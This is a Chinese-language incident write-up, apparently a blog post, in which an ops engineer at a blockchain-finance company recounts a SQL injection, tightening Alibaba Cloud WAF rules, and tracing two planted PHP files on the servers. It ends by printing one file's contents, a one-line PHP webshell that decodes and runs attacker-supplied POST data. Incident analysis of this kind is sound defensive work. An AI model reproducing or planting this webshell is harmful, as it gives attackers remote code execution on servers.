引言

一波未平，一波又起。金融公司的業(yè)務(wù)實在是太引人耳目，何況我們公司的業(yè)處正處于風(fēng)口之上（區(qū)塊鏈金融），并且每天有大量現(xiàn)金交易，所以不知道有多少躲在暗處一直在盯著你的系統(tǒng)，讓你防不勝防，并且想方設(shè)法的找到突破點，以達(dá)到的目的來獲取非法利益。

俗話說：“道高一尺，魔高一丈”。系統(tǒng)和代碼也可以這么理解，防的在好，總有漏洞。系統(tǒng)和代碼也沒有絕對的安全。該來的總會來……

sql注入與“她”相遇

某一天，天氣晴朗，心情舒暢。“她”來了，打破了筆者的美好時光。下午2點多鐘，筆者和朋友在蘇州街的天使匯二樓極客咖啡參加某個云廠商的Kubernetes一場技術(shù)沙龍，正聽得興致勃勃的時候，筆者的公司群里有個php開發(fā)突然帖出一張圖：

這個時候，群里翻騰了。沒錯，被SQL注入了，數(shù)據(jù)庫的表被注入了字段，并且經(jīng)檢查后，發(fā)現(xiàn)這個庫中的大部分表都被注入了這個字段。我的電腦沒帶在身邊，真是著急，馬上跟總監(jiān)說明問題嚴(yán)重性。由于我電腦不在身邊， 只能把數(shù)據(jù)庫賬號授權(quán)（讀寫權(quán)限）給那個php開發(fā)，讓他檢查所有的表，把被注入的字段刪除掉。并查看數(shù)據(jù)和其它表有沒有被修改。好在發(fā)現(xiàn)急時，數(shù)據(jù)和業(yè)務(wù)都沒有被丟失和損壞。

這里我要說明一下，我們的業(yè)務(wù)都在阿里云，項目是以php為主，并且開通了waf防火墻，只是waf上的防護(hù)措施比較寬松。筆者在安全方面的經(jīng)驗也比較欠缺，好在開通了阿里云的WAF，讓筆者在排查和防護(hù)上也變得輕松和快捷。

此時，我已經(jīng)在回家的路上，回到家中迅速打開電腦。

調(diào)整waf策略

由于筆者也是剛接手工作，阿里云上的很多策略還沒得到及時調(diào)整。所以才這么容易被攻進(jìn)來。即然被注入了，肯定要把源給揪出來。我也在次把所有的表都檢查一遍，確認(rèn)沒問題后，在去調(diào)整waf策略，進(jìn)入阿里云。

1、進(jìn)入相關(guān)域名的防護(hù)配置，我們先來看下調(diào)整前的策略，如下圖：

從上圖可以看出，“Web應(yīng)用防護(hù)”策略是寬松模式，其主要作用就是防護(hù)SQL注入、XSS跨站等常見Web應(yīng)用，寬松模式下對業(yè)務(wù)的誤報程度最低，但也容易漏過***。“惡意IP懲罰”也沒啟用。這么寬松的防護(hù)措施風(fēng)險比較大。趕緊先調(diào)整吧。

2、調(diào)整后的策略（如有多個域名，都調(diào)整過來），如下圖：

防護(hù)策略調(diào)整過了，還需要把問題根源找到啊，這才是最重要的！！！

查找可疑文件

此時，php的項目源碼分布在好幾臺服務(wù)器上，如果靠傳統(tǒng)方式去排查，挨個檢查這些服務(wù)器的目錄，各種能用的命令都用上了，是不是也挺費(fèi)勁費(fèi)時的，還不知道要查到啥時候。這個時候，阿里有項服務(wù)起到關(guān)鍵的作用了：“態(tài)勢感知”，這個需要升級為企業(yè)版本（費(fèi)用不高，我們公司開通了一年，費(fèi)用6000多塊）。這就是用阿里的好處（不是打廣告），確實讓你省心。

1、進(jìn)入“態(tài)勢感知”查看一下，就立馬發(fā)現(xiàn)了一堆異常行為，遍布在好幾臺服務(wù)器上如下圖：

2、點幾個異常行為進(jìn)入看看，我就打開其中兩個行為看一下，其它的行為也都差不多，如下圖：

從命令行參數(shù)中可以看出相關(guān)目錄有/Mode/Lite/ ，并且給出的解決方案是及時排查可疑目錄下的信息并及時清除。筆者順著給出的提示在服務(wù)器上進(jìn)行 find 相關(guān)目錄，查找出目錄所在路徑，如下圖：

順藤摸瓜吧，列一下這個目錄的文件：

從上圖發(fā)現(xiàn)了有兩個異常的php文件，目錄屬主也和其它文件不一樣，筆者打開代碼倉庫也進(jìn)入相同的目錄進(jìn)行比對，代碼倉庫中確實沒有這兩個文件。為了確認(rèn)清楚，把這兩個文件down下來發(fā)給開發(fā)。開發(fā)說項目中沒有這兩個文件。把它down下來打開文件看看：

Content.class.php文件內(nèi)容：

<?php @($_=base64_decode($_POST[1])).$_(hex2bin($_POST[2]))?>
}